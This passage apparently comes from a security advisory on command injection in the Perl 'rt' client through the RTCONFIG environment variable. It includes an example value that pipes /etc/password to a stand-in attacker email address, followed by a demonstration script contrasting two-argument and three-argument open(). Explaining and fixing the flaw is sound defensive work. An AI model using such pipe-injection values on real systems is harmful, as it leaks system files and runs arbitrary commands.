...
This subroutine is called by the subroutine `config_from_file`, which is itself invoked from the following:
```perl
config_from_file($ENV{RTCONFIG} || ".rtrc"),
```
Since any user can invoke the `rt` executable with environment variables they control, a hostile user may set the `RTCONFIG` environment variable to a malicious command, such as:
```
cat /etc/password | mail some@badguy.net |
```
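The following Perl script is an added illustration, not code from rt or from the original page. It contrasts how a trailing-pipe value is handled by a two-argument `open()` and by the three-argument form, assuming the subroutine passes the name to a two-argument `open()` (this excerpt does not show that call). The helper names, the temporary file and the harmless `echo` value are constructed for the example.

```perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Assumed shape of the vulnerable call: the name reaches a two-argument
# open(), so Perl parses mode characters (such as a trailing '|') out of it.
sub open_two_arg {
    my ($name) = @_;
    open(my $fh, $name) or return;
    return $fh;
}

# Hardened form: the explicit '<' mode makes $name a literal path and nothing else.
sub open_three_arg {
    my ($name) = @_;
    open(my $fh, '<', $name) or return;
    return $fh;
}

# Constructed inputs: a real temporary config file, and a value with the same
# trailing-pipe shape as the hostile RTCONFIG above but a harmless command.
my ($tmp, $good) = tempfile(UNLINK => 1);
print {$tmp} "server https://rt.example.invalid\n";
close $tmp;

for my $value ($good, 'echo command-was-run |') {
    local $ENV{RTCONFIG} = $value;
    my $name = $ENV{RTCONFIG} || '.rtrc';
    for my $case (['two-arg', \&open_two_arg], ['three-arg', \&open_three_arg]) {
        my ($label, $opener) = @$case;
        my $fh   = $opener->($name);
        my $line = $fh ? <$fh> : undef;
        close $fh if $fh;
        chomp $line if defined $line;
        # two-arg + pipe value reads the command's output; three-arg fails to
        # find a file with that literal name.
        printf "%-9s %-26s => %s\n", $label, "'$value'",
            defined $line ? "read: $line" : "open failed: $!";
    }
}
```

With the pipe-shaped value, the two-argument call returns the command's output as if it were file content, while the three-argument call fails because no file has that literal name.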
...